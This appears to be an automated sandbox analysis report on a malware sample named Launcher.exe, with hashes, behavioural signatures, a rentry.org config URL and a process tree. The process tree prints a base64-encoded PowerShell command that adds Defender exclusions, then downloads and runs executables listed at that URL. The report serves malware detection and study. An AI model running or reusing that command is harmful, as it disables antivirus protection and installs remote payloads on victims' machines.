Analysis
-
max time kernel
1799s -
max time network
1801s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
15-06-2024 18:55
Static task
static1
Behavioral task
behavioral1
Sample
Crown.zip
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
Crown.zip
Resource
win10v2004-20240611-en
Behavioral task
behavioral3
Sample
Launcher.exe
Resource
win7-20240611-en
Behavioral task
behavioral4
Sample
Launcher.exe
Resource
win10v2004-20240508-en
General
-
Target
Launcher.exe
-
Size
7KB
-
MD5
b5e479d3926b22b59926050c29c4e761
-
SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24
-
SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
-
SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
-
SSDEEP
192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio
Malware Config
Extracted
https://rentry.org/lem61111111111/raw
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Launcher.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation Launcher.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 6 IoCs
Processes:
chrome.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 3 IoCs
Processes:
chrome.exechrome.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133629523837460155" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exechrome.exechrome.exechrome.exepid process 216 powershell.exe 216 powershell.exe 3280 chrome.exe 3280 chrome.exe 3884 chrome.exe 3884 chrome.exe 548 chrome.exe 548 chrome.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 25 IoCs
Processes:
chrome.exechrome.exepid process 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exechrome.exechrome.exedescription pid process Token: SeDebugPrivilege 216 powershell.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3280 chrome.exe Token: SeCreatePagefilePrivilege 3280 chrome.exe Token: SeShutdownPrivilege 3884 chrome.exe Token: SeCreatePagefilePrivilege 3884 chrome.exe Token: SeShutdownPrivilege 3884 chrome.exe Token: SeCreatePagefilePrivilege 3884 chrome.exe Token: SeShutdownPrivilege 3884 chrome.exe Token: SeCreatePagefilePrivilege 3884 chrome.exe Token: SeShutdownPrivilege 3884 chrome.exe Token: SeCreatePagefilePrivilege 3884 chrome.exe Token: SeShutdownPrivilege 3884 chrome.exe -
Suspicious use of FindShellTrayWindow 53 IoCs
Processes:
chrome.exechrome.exepid process 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe -
Suspicious use of SendNotifyMessage 48 IoCs
Processes:
chrome.exechrome.exepid process 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3280 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe 3884 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Launcher.exechrome.exedescription pid process target process PID 2356 wrote to memory of 216 2356 Launcher.exe powershell.exe PID 2356 wrote to memory of 216 2356 Launcher.exe powershell.exe PID 3280 wrote to memory of 4064 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 4064 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2580 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 4380 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 4380 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe PID 3280 wrote to memory of 2220 3280 chrome.exe chrome.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Launcher.exe"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4356,i,4686244434963378549,11462511444150484980,262144 --variations-seed-version --mojo-platform-channel-handle=3656 /prefetch:81⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1392,i,4686244434963378549,11462511444150484980,262144 --variations-seed-version --mojo-platform-channel-handle=3212 /prefetch:81⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffefa6ab58,0x7fffefa6ab68,0x7fffefa6ab782⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1672 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2276 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2956 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2980 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4436 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4844 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4960 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4604 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5104 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=3296 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=3416 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=4516 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4144 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4800 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=3400 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4252 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4676 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=3944 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=4556 --field-trial-handle=1948,i,11412587318512774665,17818369700109801903,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"1⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7fffefa6ab58,0x7fffefa6ab68,0x7fffefa6ab782⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=556 --field-trial-handle=1884,i,11492178344988070627,10679876046639866295,131072 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 --field-trial-handle=1884,i,11492178344988070627,10679876046639866295,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2116 --field-trial-handle=1884,i,11492178344988070627,10679876046639866295,131072 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3076 --field-trial-handle=1884,i,11492178344988070627,10679876046639866295,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3104 --field-trial-handle=1884,i,11492178344988070627,10679876046639866295,131072 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4364 --field-trial-handle=1884,i,11492178344988070627,10679876046639866295,131072 /prefetch:12⤵
-
